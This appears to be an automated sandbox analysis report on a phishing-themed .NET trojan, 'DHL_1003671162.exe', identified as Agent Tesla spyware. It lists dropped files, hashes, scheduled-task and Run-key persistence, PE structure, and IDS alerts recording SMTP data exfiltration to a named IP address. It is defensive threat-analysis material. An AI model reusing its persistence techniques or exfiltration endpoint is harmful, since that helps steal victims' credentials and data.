                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:DHL_1003671162.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@29/16@1/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 430
                                              • Number of non-executed functions: 25
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes were analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              Time | Type | Description
                                              06:15:12 | Task Scheduler | Run new task: qmUxKv path: C:\Users\user\AppData\Roaming\qmUxKv.exe
                                              06:15:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              06:15:22 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              07:15:09 | API Interceptor | 21x Sleep call for process: DHL_1003671162.exe modified
                                              07:15:11 | API Interceptor | 16x Sleep call for process: powershell.exe modified
                                              07:15:13 | API Interceptor | 18x Sleep call for process: qmUxKv.exe modified
                                              07:15:22 | API Interceptor | 35x Sleep call for process: boqXv.exe modified
                                              Process:C:\Users\user\Desktop\DHL_1003671162.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):1415
                                              Entropy (8bit):5.352427679901606
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                              MD5:3978978DE913FD1C068312697D6E5917
                                              SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                              SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                              SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
                                              Process:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1415
                                              Entropy (8bit):5.352427679901606
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                              MD5:3978978DE913FD1C068312697D6E5917
                                              SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                              SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                              SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
                                              Process:C:\Users\user\AppData\Roaming\qmUxKv.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):1415
                                              Entropy (8bit):5.352427679901606
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                              MD5:3978978DE913FD1C068312697D6E5917
                                              SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                              SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                              SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.379401388151058
                                              Encrypted:false
                                              SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugei/ZPUyus:fLHxvIIwLgZ2KRHWLOugss
                                              MD5:AE6DF85157F6BF3C6D9A1FF77B6B442B
                                              SHA1:16EFB3DD6B191D135EBB0D3E01C0B86EA3E7DFEC
                                              SHA-256:807D3BFCD4C81BBB6C2FA2A9D79D08CB3040DB48512304EA5ADEF746DAD879AE
                                              SHA-512:0DA4437659BC9636F6EC248C482935ADDAD8DB2FC69F5F663553D0ED10D6A955B2CF6C8661ED9E6135DC64D3FE6895EC88443B5C7C947B2B08EB291193670C7E
                                              Malicious:false
                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Users\user\Desktop\DHL_1003671162.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1572
                                              Entropy (8bit):5.113532252556436
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaZVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTmrv
                                              MD5:89FEF81066306B1759BE0856C8FE5E78
                                              SHA1:4145ED14D6F8002F26DB2FBA3C69CD600D147443
                                              SHA-256:9386161F71530D91BD7E9E4E71B1A4BF5BFB8A5ADEC85F5AD805C53B26C9B297
                                              SHA-512:AA7240B765D7564230CB6EB4117B8D013F8209212620E7636ED65B2C40FB9C77D24B53304A4C8DBB35E40E6FC26C49DE05AABB0F323FC850667DD93E71E875CB
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                              Process:C:\Users\user\AppData\Roaming\qmUxKv.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1572
                                              Entropy (8bit):5.113532252556436
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaZVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTmrv
                                              MD5:89FEF81066306B1759BE0856C8FE5E78
                                              SHA1:4145ED14D6F8002F26DB2FBA3C69CD600D147443
                                              SHA-256:9386161F71530D91BD7E9E4E71B1A4BF5BFB8A5ADEC85F5AD805C53B26C9B297
                                              SHA-512:AA7240B765D7564230CB6EB4117B8D013F8209212620E7636ED65B2C40FB9C77D24B53304A4C8DBB35E40E6FC26C49DE05AABB0F323FC850667DD93E71E875CB
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                              Process:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1572
                                              Entropy (8bit):5.113532252556436
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaZVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTmrv
                                              MD5:89FEF81066306B1759BE0856C8FE5E78
                                              SHA1:4145ED14D6F8002F26DB2FBA3C69CD600D147443
                                              SHA-256:9386161F71530D91BD7E9E4E71B1A4BF5BFB8A5ADEC85F5AD805C53B26C9B297
                                              SHA-512:AA7240B765D7564230CB6EB4117B8D013F8209212620E7636ED65B2C40FB9C77D24B53304A4C8DBB35E40E6FC26C49DE05AABB0F323FC850667DD93E71E875CB
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                              Process:C:\Users\user\Desktop\DHL_1003671162.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):840704
                                              Entropy (8bit):7.457785624084394
                                              Encrypted:false
                                              SSDEEP:12288:KVF9WM+YLoxLQE5VT0kAEXSk5SHkXuusBOlWzMIhnc:E2M+RLZVT0xMbSC69znh
                                              MD5:1D584D84D4965E7A0DA615B32AB85F2E
                                              SHA1:BBB9C2211444450BB34A27F1A98D778E3C96B9BB
                                              SHA-256:061087CD835ABCFC3411F0EC4B15CCF80516276A356B2EEDC4CB444D0DAC0187
                                              SHA-512:69C79F42F6F91AB4EA8F2FC8D80C2423450FB8FC5B9BCB7A0DD0CD3C11167947402E7D027CCFD5EC4A7303AC3F269DEFDD7A63902272D6B60C660500C84EBBC8
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              • Antivirus: Virustotal, Detection: 58%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L'f.................4...........R... ...`....@.. ....................... ............@.................................HR..W....`.............................................................................. ............... ..H............text....2... ...4.................. ..`.rsrc.......`.......6..............@..@.reloc..............................@..B.................R......H.......X....<...........w..............................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o[...:q....(....+..(........}.........(......*................n..}.....{....,..{....oK...*..{....*.s..
                                              Process:C:\Users\user\Desktop\DHL_1003671162.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Users\user\Desktop\DHL_1003671162.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):840704
                                              Entropy (8bit):7.457785624084394
                                              Encrypted:false
                                              SSDEEP:12288:KVF9WM+YLoxLQE5VT0kAEXSk5SHkXuusBOlWzMIhnc:E2M+RLZVT0xMbSC69znh
                                              MD5:1D584D84D4965E7A0DA615B32AB85F2E
                                              SHA1:BBB9C2211444450BB34A27F1A98D778E3C96B9BB
                                              SHA-256:061087CD835ABCFC3411F0EC4B15CCF80516276A356B2EEDC4CB444D0DAC0187
                                              SHA-512:69C79F42F6F91AB4EA8F2FC8D80C2423450FB8FC5B9BCB7A0DD0CD3C11167947402E7D027CCFD5EC4A7303AC3F269DEFDD7A63902272D6B60C660500C84EBBC8
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              • Antivirus: Virustotal, Detection: 58%, Browse
                                              Process:C:\Users\user\Desktop\DHL_1003671162.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.457785624084394
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:DHL_1003671162.exe
                                              File size:840'704 bytes
                                              MD5:1d584d84d4965e7a0da615b32ab85f2e
                                              SHA1:bbb9c2211444450bb34a27f1a98d778e3c96b9bb
                                              SHA256:061087cd835abcfc3411f0ec4b15ccf80516276a356b2eedc4cb444d0dac0187
                                              SHA512:69c79f42f6f91ab4ea8f2fc8d80c2423450fb8fc5b9bcb7a0dd0cd3c11167947402e7d027ccfd5ec4a7303ac3f269defdd7a63902272d6b60c660500c84ebbc8
                                              SSDEEP:12288:KVF9WM+YLoxLQE5VT0kAEXSk5SHkXuusBOlWzMIhnc:E2M+RLZVT0xMbSC69znh
                                              TLSH:83059BCD27C9D552E2ED3D70D00D53F10F2CEC1214D2DACA9B6A719A8AB9B8BD512873
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L'f.................4...........R... ...`....@.. ....................... ............@................................
                                              Icon Hash:1761c261b0702917
                                              Entrypoint:0x4a52a2
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66274CBA [Tue Apr 23 05:52:58 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa5248 | 0x57 | .text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa6000 | 0x29bc8 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd0000 | 0xc | .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x2000 | 0xa32a8 | 0xa3400 | ec292dba19025f294bdd1f4c68d141c3 | False | 0.9647315873851455 | data | 7.970864904869302 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc | 0xa6000 | 0x29bc8 | 0x29c00 | bc5387ea546ed2648930a87ebc8bdd6a | False | 0.12335095434131736 | data | 3.144106503394127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc | 0xd0000 | 0xc | 0x200 | 1f38e27bb5ec139155935cd0f944c5fc | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                              RT_ICON | 0xa62b0 | 0x1c04 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9959564974902398
                                              RT_ICON | 0xa7eb4 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.04662545841713001
                                              RT_ICON | 0xb86dc | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | | | 0.07381227664494429
                                              RT_ICON | 0xc1b84 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | | | 0.08701478743068392
                                              RT_ICON | 0xc700c | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.08915918752952291
                                              RT_ICON | 0xcb234 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.15508298755186722
                                              RT_ICON | 0xcd7dc | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.18714821763602252
                                              RT_ICON | 0xce884 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.30901639344262294
                                              RT_ICON | 0xcf20c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.39184397163120566
                                              RT_GROUP_ICON | 0xcf674 | 0x84 | data | | | 0.696969696969697
                                              RT_VERSION | 0xcf6f8 | 0x31c | data | | | 0.4484924623115578
                                              RT_MANIFEST | 0xcfa14 | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385
                                              DLL | Import
                                              mscoree.dll | _CorExeMain
                                              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                              04/24/24-07:15:28.935178 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49738 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:34.872020 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49743 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:17.806983 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49736 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:17.806983 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49736 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:17.806983 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49736 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:15.003229 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49733 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:15.003229 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49733 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:34.872156 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49743 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:15.003170 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49733 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:28.935275 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49738 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:28.935275 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49738 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:28.935178 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49738 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:34.872020 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49743 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:17.806983 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49736 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:17.806983 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49736 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:34.872156 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49743 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:15.003170 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49733 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:28.935275 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49738 | 587 | 192.168.2.4 | 50.87.253.239
                                              04/24/24-07:15:15.003229 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49733 | 587 | 192.168.2.4 | 50.87.253.239
